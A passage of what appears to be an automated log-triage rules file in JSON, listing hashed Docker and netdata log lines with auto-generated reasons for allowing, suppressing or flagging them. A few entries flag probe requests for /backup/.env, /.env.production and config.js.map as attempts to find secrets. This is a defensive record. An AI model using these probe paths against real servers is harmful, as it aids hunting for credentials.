/backup/.env is commonly probed by attackers to discover sensitive environment configuration. The 404 indicates the resource doesn't exist, but the attempted access pattern is noteworthy.", "original_line": "\u001b[0mGET /backup/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.697 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:42.093795142Z" }, "faca1f32a965ea259691776502b4e5e3d06656e630202d413da6461375f89d51": { "type": "hash", "value": "faca1f32a965ea259691776502b4e5e3d06656e630202d413da6461375f89d51", "source": "auto", "reason": "Request for a hidden environment file (.env.production) on a public endpoint combined with a 404 response suggests probing for sensitive files.", "original_line": "\u001b[0mGET /.env.production \u001b[33m404\u001b[\u003cDUR\u003e 0.609 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:27.473836697Z" }, "fb0332a4f6b6ba50d44095433eb72c0f856aa12a87e79a149a84be97ee2c355d": { "type": "hash", "value": "fb0332a4f6b6ba50d44095433eb72c0f856aa12a87e79a149a84be97ee2c355d", "source": "auto", "reason": "Request for a source map file (config.js.map) returning 404 can indicate probing for source artifacts, which is common in reconnaissance but not necessarily malicious.", "original_line": "\u001b[0mGET /config.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.655 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:23.034913112Z" } } }, "suppress": { "hashes": { "0015fd187f2991380809c346a90bb1330db0a5afe41db652bad730861121616d": { "type": "hash", "value": "0015fd187f2991380809c346a90bb1330db0a5afe41db652bad730861121616d", "source": "auto", "reason": "Looks like routine HTTP access log for a successful request (304 Not Modified) from a Docker container/service; no signs of attack or errors.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.513 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:21.800534725Z" }, "0b3260e729990406cb8df5827b4f4280de24d4ff9c2f1ad21c50de20fb68610b": { "type": "hash", "value": "0b3260e729990406cb8df5827b4f4280de24d4ff9c2f1ad21c50de20fb68610b", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a normal 304 response; likely uninteresting/expected log polling. ANSI color escape sequences are present, suggesting noisy rendering rather than meaningful security signal.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.432 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:30.55307899Z" }, "0ff7c6e67c5bc1b34327420bb1f596f1e76797dbb5cc406605cab0a0fb4b3300": { "type": "hash", "value": "0ff7c6e67c5bc1b34327420bb1f596f1e76797dbb5cc406605cab0a0fb4b3300", "source": "auto", "reason": "Docker/HTTP access log for a single API endpoint returning 304 (not modified); likely routine polling/cache validation traffic rather than an error or attack.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.936 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:43:06.865516229Z" }, "184c583c224d76c90b3db35967b8711284bec2550f63111c77d252d822c6d2ec": { "type": "hash", "value": "184c583c224d76c90b3db35967b8711284bec2550f63111c77d252d822c6d2ec", "source": "auto", "reason": "Looks like routine HTTP access logging for a specific API endpoint with a 304 response; operational and likely low-signal for security.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.782 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:36.811643354Z" }, "1c177438da0065092691da1a31c11edd9a8915db7fb16148b8d8ce4d45cfc867": { "type": "hash", "value": "1c177438da0065092691da1a31c11edd9a8915db7fb16148b8d8ce4d45cfc867", "source": "auto", "reason": "Looks like routine HTTP access logging for an API endpoint returning 304 (not modified); likely normal, low-risk traffic and the line mainly captures status/DUR.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.107 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:42.732374192Z" }, "1c3d890bb9317a5ed0c20dbe6cc898a44d63c402eac36109ff7911f59626fb66": { "type": "hash", "value": "1c3d890bb9317a5ed0c20dbe6cc898a44d63c402eac36109ff7911f59626fb66", "source": "auto", "reason": "Looks like a routine authenticated API GET returning HTTP 304 (Not Modified) with a fetch duration; likely normal cache validation traffic rather than an error or attack.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.433 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:27.671753775Z" }, "1f1afab1594fe953ecabd44c80985271d4dbda8b722a62952582b34c775cb795": { "type": "hash", "value": "1f1afab1594fe953ecabd44c80985271d4dbda8b722a62952582b34c775cb795", "source": "auto", "reason": "Repeated HTTP GET to application logs endpoint returning 304 (not modified) with no apparent error; likely routine polling/cache validation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.074 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:15.709559528Z" }, "28e45f4e04ffe2c0e443e8b97d18c6fffdd1174666348488f5e75463da999689": { "type": "hash", "value": "28e45f4e04ffe2c0e443e8b97d18c6fffdd1174666348488f5e75463da999689", "source": "auto", "reason": "Looks like routine HTTP GET access logging with a fixed path; response code and timings vary. Not clearly an error or attack.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.670 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:18.651131341Z" }, "2add01af2b1571646e8a18c25c904e3ad0bfce21f3aee700eb4879641cba2c86": { "type": "hash", "value": "2add01af2b1571646e8a18c25c904e3ad0bfce21f3aee700eb4879641cba2c86", "source": "auto", "reason": "Routine HTTP GET returning 304 (not modified) with short latency; appears like normal app polling/caching and not an error or attack indicator.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.504 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:48.925179392Z" }, "3067111dc6bb05ff5083a0657fe6ef8a2aeb51e160cc37777401e57cf59d4fef": { "type": "hash", "value": "3067111dc6bb05ff5083a0657fe6ef8a2aeb51e160cc37777401e57cf59d4fef", "source": "auto", "reason": "HTTP GET to an internal API returning 304 (not modified) with routine timing; appears like normal web/cache revalidation rather than an error or attack.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.675 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:45.894551419Z" }, "342b268baead92931ea9ef191afbfd0a1972a84304510874ae1fd08f14a69d49": { "type": "hash", "value": "342b268baead92931ea9ef191afbfd0a1972a84304510874ae1fd08f14a69d49", "source": "auto", "reason": "Looks like routine HTTP access logging (GET to API logs) with a successful 304 response; not enough context to treat as suspicious.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.158 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:51.610627972Z" }, "36b58087d4bdf31351db416e66afd35d688545716bbab178747501b3a6d426cf": { "type": "hash", "value": "36b58087d4bdf31351db416e66afd35d688545716bbab178747501b3a6d426cf", "source": "auto", "reason": "Routine NGINX reload locking message from a container; likely normal operational chatter and not security-relevant.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.413 pm \u001b[0mLocking NGINX configuration reloading...", "created_at": "2026-03-19T22:31:37.598260745Z" }, "37fe972c0e511675494a1a3c4561e2d8a177bec55c4132ae6b912f200bb16f54": { "type": "hash", "value": "37fe972c0e511675494a1a3c4561e2d8a177bec55c4132ae6b912f200bb16f54", "source": "auto", "reason": "Looks like routine HTTP access logging for an API endpoint returning 304 (not modified); likely normal polling/conditional requests, low risk.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.171 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:39.794183801Z" }, "3dc0ad562d07bad4bddc9014f5d8496c908e7dd3b112474cf084872aa2c88811": { "type": "hash", "value": "3dc0ad562d07bad4bddc9014f5d8496c908e7dd3b112474cf084872aa2c88811", "source": "auto", "reason": "Appears to be a routine HTTP GET request log line from a web service with 304 responses (not modified). Likely normal caching/health-style traffic and includes escape color codes.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 29.718 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:43:03.821542105Z" }, "3dc8fd0785ace8135de5e212d14452347708db34f951b46b5171745e6c14cd0f": { "type": "hash", "value": "3dc8fd0785ace8135de5e212d14452347708db34f951b46b5171745e6c14cd0f", "source": "auto", "reason": "Looks like routine HTTP access logging for a specific API endpoint (expected 200/304-style status) with a response time; no clear error or attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.279 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:18.675652506Z" }, "3f3105d37f987ae2de2ec9a4f2c15b78bef660c863acaee30f067a67bf110894": { "type": "hash", "value": "3f3105d37f987ae2de2ec9a4f2c15b78bef660c863acaee30f067a67bf110894", "source": "auto", "reason": "Routine HTTP GET access log returning 304 (not modified) with a normal latency; likely low-signal caching/status traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.737 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:51.696563891Z" }, "593adc401793b27b54dc77360f2c7ab233f52f12971f528ee5390eb98c77a2e5": { "type": "hash", "value": "593adc401793b27b54dc77360f2c7ab233f52f12971f528ee5390eb98c77a2e5", "source": "auto", "reason": "Looks like routine HTTP access log for a Docker container (GET returning 304 Not Modified) with no error indicators; likely high-volume noise.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.379 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:24.833136517Z" }, "7ab3b6e580e7c106c2843225ad70aaaa3065f6a017e14f418b8dd24eb07af704": { "type": "hash", "value": "7ab3b6e580e7c106c2843225ad70aaaa3065f6a017e14f418b8dd24eb07af704", "source": "auto", "reason": "HTTP access log line for a health/routine API request (200/304-like status) with no indication of failure or attack; appears to be debug/templated output from a containerized service.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.101 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:18.723085146Z" }, "7c1b6bab99162b5da3dfce1aaa01aff5b484829aeb829cc5673c14ed4aae986b": { "type": "hash", "value": "7c1b6bab99162b5da3dfce1aaa01aff5b484829aeb829cc5673c14ed4aae986b", "source": "auto", "reason": "Looks like routine HTTP request access logging (GET) with a 304 response; likely normal polling/caching behavior and not inherently suspicious.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.524 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:06.75171196Z" }, "85f77028b015b189521cc68799d365fe240305680ea49b612aef0cbdb6e6ef72": { "type": "hash", "value": "85f77028b015b189521cc68799d365fe240305680ea49b612aef0cbdb6e6ef72", "source": "auto", "reason": "Log looks like a routine reload/signal notification from a containerized process; no clear evidence of compromise.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.534 pm \u001b[0msendReloadSignal...", "created_at": "2026-03-19T22:31:39.750662051Z" }, "9bce3f79c3be1e8e2cc5fc80f7d33ba615db1fa5bd9200bff0ee553dc8de5a9e": { "type": "hash", "value": "9bce3f79c3be1e8e2cc5fc80f7d33ba615db1fa5bd9200bff0ee553dc8de5a9e", "source": "auto", "reason": "HTTP GET to an internal API endpoint returning 304 (not modified); frequent cache/normal retrieval traffic is typically low value and may be noisy.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.310 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:45.179570842Z" }, "a976d7c70dd891cf13f36b0d603bd301bbf3056d9a0f975e2c071444cac19dd3": { "type": "hash", "value": "a976d7c70dd891cf13f36b0d603bd301bbf3056d9a0f975e2c071444cac19dd3", "source": "auto", "reason": "Docker container stdout shows an access log line (HTTP GET returning 304). Likely routine polling/conditional requests; not inherently suspicious on its own.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 137.912 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:03.845302194Z" }, "ab15a807adfb6bdcd349e20eaec59e44ca662512dc063161a9f879eb0e347f73": { "type": "hash", "value": "ab15a807adfb6bdcd349e20eaec59e44ca662512dc063161a9f879eb0e347f73", "source": "auto", "reason": "Looks like a routine HTTP GET request log from a Docker container with normal 304 (Not Modified) responses; likely access logging noise rather than security-relevant events.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.229 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:25.984039466Z" }, "bea58391a4e6a3143685ae0e408289816546892ee3ec5db8c41a8f5db8ef90bc": { "type": "hash", "value": "bea58391a4e6a3143685ae0e408289816546892ee3ec5db8c41a8f5db8ef90bc", "source": "auto", "reason": "Routine HTTP GET to an API endpoint returning 304 (not modified) with a small duration; looks like normal polling/cache validation traffic from a browser/app.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.139 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:12.905576241Z" } } } }, "docker:captain-netdata-container": { "allow": { "hashes": { "050d79d8002aa024e27e1d4f9e30f4326d26fac7f14545a113e82a43def8b70c": { "type": "hash", "value": "050d79d8002aa024e27e1d4f9e30f4326d26fac7f14545a113e82a43def8b70c", "source": "auto", "reason": "Normal operational info from netdata container indicating creation of a data file.", "original_line": "\u003cNUM\u003e-03-20 11:06:48: netdata INFO : MAIN : Created data file \"/var/cache/netdata/dbengine/datafile-1-\u003cNUM\u003e.ndf\".", "created_at": "2026-03-20T11:07:04.23047238Z" }, "062af87821141c6b7c8e0d44bc92f21ef5b9797307d495f1673c9d6893ef5f18": { "type": "hash", "value": "062af87821141c6b7c8e0d44bc92f21ef5b9797307d495f1673c9d6893ef5f18", "source": "auto", "reason": "A benign warning about missing FireQOS components in a system monitoring context. Not an error or attack.", "original_line": "\u003cNUM\u003e-03-20 10:34:53: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T10:35:00.228885064Z" }, "0a37862aaa0f622bb1de6876d7625c2c328c659714872223f37ad55400f41421": { "type": "hash", "value": "0a37862aaa0f622bb1de6876d7625c2c328c659714872223f37ad55400f41421", "source": "auto", "reason": "A missing configuration file warning is a common and expected operational message, not evidence of intrusion or misuse.", "original_line": "\u003cNUM\u003e-03-20 15:35:03: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T15:35:21.008766752Z" }, "0a67020a8fc91d256886ba352a91b68d89e955ddb44358c075c55e53f76e1e03": { "type": "hash", "value": "0a67020a8fc91d256886ba352a91b68d89e955ddb44358c075c55e53f76e1e03", "source": "auto", "reason": "This is a routine warning about a missing configuration file within a container. Not indicative of attack; could be benign misconfiguration.", "original_line": "\u003cNUM\u003e-03-20 15:35:03: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T15:35:28.006686036Z" }, "0bb0ddd26883563b61e861d93e8570754834f38691da89e949187d3e3ef15443": { "type": "hash", "value": "0bb0ddd26883563b61e861d93e8570754834f38691da89e949187d3e3ef15443", "source": "auto", "reason": "Normal warning message from a script indicating a missing optional component; not indicative of abuse or breach.", "original_line": "\u003cNUM\u003e-03-20 03:34:39: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T03:34:44.435872068Z" }, "0e9eac4483d47b7e6e68632e3372bd350b1a17284a57cc9c02221fee9f780849": { "type": "hash", "value": "0e9eac4483d47b7e6e68632e3372bd350b1a17284a57cc9c02221fee9f780849", "source": "auto", "reason": "A routine warning about a missing FireQOS component within a monitoring script; no evidence of attack or misuse.", "original_line": "\u003cNUM\u003e-03-20 12:34:57: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T12:35:02.382695834Z" }, "0ea3ed09ef843cd2fd397b26485f62a883226449a6895f481b13b552c656e2ca": { "type": "hash", "value": "0ea3ed09ef843cd2fd397b26485f62a883226449a6895f481b13b552c656e2ca", "source": "auto", "reason": "Routine startup/diagnostic warning indicating a missing optional component (FireQOS). Not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 15:35:03: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T15:35:14.004565235Z" }, "11c9bae623478e636a56e8a56a8237e82d20181d2a93e821ebe4a386c86673af": { "type": "hash", "value": "11c9bae623478e636a56e8a56a8237e82d20181d2a93e821ebe4a386c86673af", "source": "auto", "reason": "A routine non-fatal warning about a missing config file in a startup script. Not indicative of malicious behavior.", "original_line": "\u003cNUM\u003e-03-20 08:34:49: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T08:35:08.171589599Z" }, "12db35157ab1d4705b9830846206a55e7b613fe44ec28cefa2b332a44b580d82": { "type": "hash", "value": "12db35157ab1d4705b9830846206a55e7b613fe44ec28cefa2b332a44b580d82", "source": "auto", "reason": "A benign warning about a missing configuration file in a startup script; no indicators of tampering or attack.", "original_line": "\u003cNUM\u003e-03-20 04:34:41: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T04:35:00.255738315Z" }, "1990ce79d8db558b2f72cdf22b55f90aa1dab15446317348004bb37f6302cc7c": { "type": "hash", "value": "1990ce79d8db558b2f72cdf22b55f90aa1dab15446317348004bb37f6302cc7c", "source": "auto", "reason": "Missing configuration file is a benign warning typically encountered in startup or runtime checks; not an indication of attack.", "original_line": "\u003cNUM\u003e-03-20 03:34:39: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T03:34:48.916813698Z" }, "1de1aacd3301497ac31513a6caf605509c5ead4163d5522235a4a67180d71d9c": { "type": "hash", "value": "1de1aacd3301497ac31513a6caf605509c5ead4163d5522235a4a67180d71d9c", "source": "auto", "reason": "A non-critical warning about a missing tool (FireQOS) in a container environment; not indicative of an attack or misuse.", "original_line": "\u003cNUM\u003e-03-20 04:34:41: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T04:34:50.543630934Z" }, "2d5a0a289ad018d497518d805781a6edcf31c2c275fbcab2ec62d76c79e04d42": { "type": "hash", "value": "2d5a0a289ad018d497518d805781a6edcf31c2c275fbcab2ec62d76c79e04d42", "source": "auto", "reason": "Normal non-critical warning about a missing configuration file in a likely maintenance scenario.", "original_line": "\u003cNUM\u003e-03-20 01:34:35: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T01:34:53.321363721Z" }, "32c02e8772685b188f3afa197aa2183dd45ff4d10181c8a9bc07b7191e56ee49": { "type": "hash", "value": "32c02e8772685b188f3afa197aa2183dd45ff4d10181c8a9bc07b7191e56ee49", "source": "auto", "reason": "A missing config file warning is common during startup or health checks and not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 12:34:57: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T12:35:17.879324245Z" }, "3ab7a782b07933134fe887c8abc649c89355567132bf6a32c2c6958689ea1892": { "type": "hash", "value": "3ab7a782b07933134fe887c8abc649c89355567132bf6a32c2c6958689ea1892", "source": "auto", "reason": "A routine startup warning about a missing configuration file. No malicious content detected; common in containerized environments when optional config is absent.", "original_line": "\u003cNUM\u003e-03-20 11:34:55: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T11:35:21.035238235Z" }, "3d43e46908a0a1e39a542080baf57a2f5e2ccf2a68e90caeab73d843bf2dd7e8": { "type": "hash", "value": "3d43e46908a0a1e39a542080baf57a2f5e2ccf2a68e90caeab73d843bf2dd7e8", "source": "auto", "reason": "Normal warning about a missing configuration file in a container; not indicative of attack.", "original_line": "\u003cNUM\u003e-03-20 05:34:43: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T05:34:56.986692124Z" }, "4154063bab19c8dd7b6755a7efc72092484f84785a17e7efc41b5f3e45fb4511": { "type": "hash", "value": "4154063bab19c8dd7b6755a7efc72092484f84785a17e7efc41b5f3e45fb4511", "source": "auto", "reason": "A routine warning about missing FireQOS on the system. Not indicative of intrusion or misbehavior.", "original_line": "\u003cNUM\u003e-03-20 11:34:55: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T11:35:06.242519397Z" }, "4270d76cdaaf79c3eab4d5f1b7d3694fdbe74a34a71b1d7338d3068d68deac10": { "type": "hash", "value": "4270d76cdaaf79c3eab4d5f1b7d3694fdbe74a34a71b1d7338d3068d68deac10", "source": "auto", "reason": "Routine warning within a container about a missing configuration file; not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 12:34:57: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T12:35:09.463346622Z" }, "453ac1859e8ecf7933437bcf135df3974db52655d0960c62970f3bc7c3e8b3bf": { "type": "hash", "value": "453ac1859e8ecf7933437bcf135df3974db52655d0960c62970f3bc7c3e8b3bf", "source": "auto", "reason": "Routine netdata operation message indicating cleanup of data and journal files; not indicative of issue.", "original_line": "\u003cNUM\u003e-03-20 05:59:36: netdata INFO : MAIN : Deleting data and journal file pair.", "created_at": "2026-03-20T05:59:48.539334311Z" }, "457351acd24e70539a1458f6b29c8934aabcad762dfe9af50d86f094b00af2d3": { "type": "hash", "value": "457351acd24e70539a1458f6b29c8934aabcad762dfe9af50d86f094b00af2d3", "source": "auto", "reason": "A routine warning about missing FireQOS software. Not indicative of abuse or intrusion; typical for system monitoring.", "original_line": "\u003cNUM\u003e-03-20 02:34:37: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T02:34:45.00810219Z" }, "4922a42fb50effd63406f40036b579731863bbc9d0b6481c12c22d9b9d4a8dbd": { "type": "hash", "value": "4922a42fb50effd63406f40036b579731863bbc9d0b6481c12c22d9b9d4a8dbd", "source": "auto", "reason": "A benign WARNING about a missing configuration file within a netdata-related script; not indicative of attack or misbehavior requiring denial.", "original_line": "\u003cNUM\u003e-03-20 04:34:41: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.", "created_at": "2026-03-20T04:35:04.843006786Z" }, "4d2fad9834dbdee1d6f7138d30f8be1af42c0661b1bc256b3099e04d1a74e67c": { "type": "hash", "value": "4d2fad9834dbdee1d6f7138d30f8be1af42c0661b1bc256b3099e04d1a74e67c", "source": "auto", "reason": "Routine warning about missing FireQOS in tc plugin; not indicative of an attack.", "original_line": "\u003cNUM\u003e-03-20 16:35:05: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T16:35:14.967576791Z" }, "4d465c94479669b62bc671f12f06d1d097e8ca01363811d547ae00ee56ac0184": { "type": "hash", "value": "4d465c94479669b62bc671f12f06d1d097e8ca01363811d547ae00ee56ac0184", "source": "auto", "reason": "A benign warning about a missing configuration file from netdata; no authentication or privilege escalation indicators.", "original_line": "\u003cNUM\u003e-03-20 07:34:47: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T07:35:03.748295597Z" }, "533628370f17f1620ca0b1049a32b81ab657676f78d5389b330badb186492bde": { "type": "hash", "value": "533628370f17f1620ca0b1049a32b81ab657676f78d5389b330badb186492bde", "source": "auto", "reason": "This is a normal non-actionable warning about a missing optional component (FireQOS). It does not indicate an attack or misconfiguration beyond an advisory.", "original_line": "\u003cNUM\u003e-03-20 13:34:59: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T13:35:07.669343824Z" }, "7d66da5c5a753294c953080a3069797525e6217aa231729339fdc1e9a6066039": { "type": "hash", "value": "7d66da5c5a753294c953080a3069797525e6217aa231729339fdc1e9a6066039", "source": "auto", "reason": "Routine informational log from netdata within a Docker container; no anomalous content detected.", "original_line": "\u003cNUM\u003e-03-20 11:06:48: netdata INFO : MAIN : Created journal file \"/var/cache/netdata/dbengine/journalfile-1-\u003cNUM\u003e.njf\".", "created_at": "2026-03-20T11:07:10.340706419Z" }, "8b917c4f240475512ea483e0248d837586b8f065d6c7633c3e9d9492da971384": { "type": "hash", "value": "8b917c4f240475512ea483e0248d837586b8f065d6c7633c3e9d9492da971384", "source": "auto", "reason": "A benign warning about a missing FireQOS component; not indicative of malicious activity", "original_line": "\u003cNUM\u003e-03-20 00:34:33: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T00:34:43.031375422Z" }, "8faaa7ae7031b980c5aafa3b6c519511cc5c5c279244518406420a3559c3d014": { "type": "hash", "value": "8faaa7ae7031b980c5aafa3b6c519511cc5c5c279244518406420a3559c3d014", "source": "auto", "reason": "Operational warning about a missing configuration file; not indicative of misuse.", "original_line": "\u003cNUM\u003e-03-20 13:34:59: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T13:35:13.524413283Z" }, "a176b7b46c2ce64b520435ac2691ddbb58d3a929cab31b7a44f0096ca1e1137b": { "type": "hash", "value": "a176b7b46c2ce64b520435ac2691ddbb58d3a929cab31b7a44f0096ca1e1137b", "source": "auto", "reason": "Normal startup/warning message from a system utility indicating a missing optional component (FireQOS). Not indicative of attack.", "original_line": "\u003cNUM\u003e-03-20 09:34:51: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T09:34:57.716264014Z" }, "a82d35d001e7119b7ad1fe871426e497a3c4017cadd162a3d931a43c8f066c3a": { "type": "hash", "value": "a82d35d001e7119b7ad1fe871426e497a3c4017cadd162a3d931a43c8f066c3a", "source": "auto", "reason": "Normal operational warning about a missing configuration file in a dockerized service; not indicative of malicious activity.", "original_line": "\u003cNUM\u003e-03-20 11:34:55: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.", "created_at": "2026-03-20T11:35:14.654251631Z" }, "a85243bbc6c13cbc34dbc68a431f6043dd47fb6dd3234251d660a01946c78d6b": { "type": "hash", "value": "a85243bbc6c13cbc34dbc68a431f6043dd47fb6dd3234251d660a01946c78d6b", "source": "auto", "reason": "A benign warning about a missing FireQOS component within a containerized Netdata setup. Not indicative of misuse or intrusion; routine operational warning.", "original_line": "\u003cNUM\u003e-03-20 07:34:47: tc-qos-helper.sh: WARNING: FireQOS is not installed on this system. Use FireQOS to apply traffic QoS and expose the class names to netdata. Check https://github.com/netdata/netdata/tree/master/collectors/tc.plugin#tcplugin", "created_at": "2026-03-20T07:34:54.717140743Z" }, 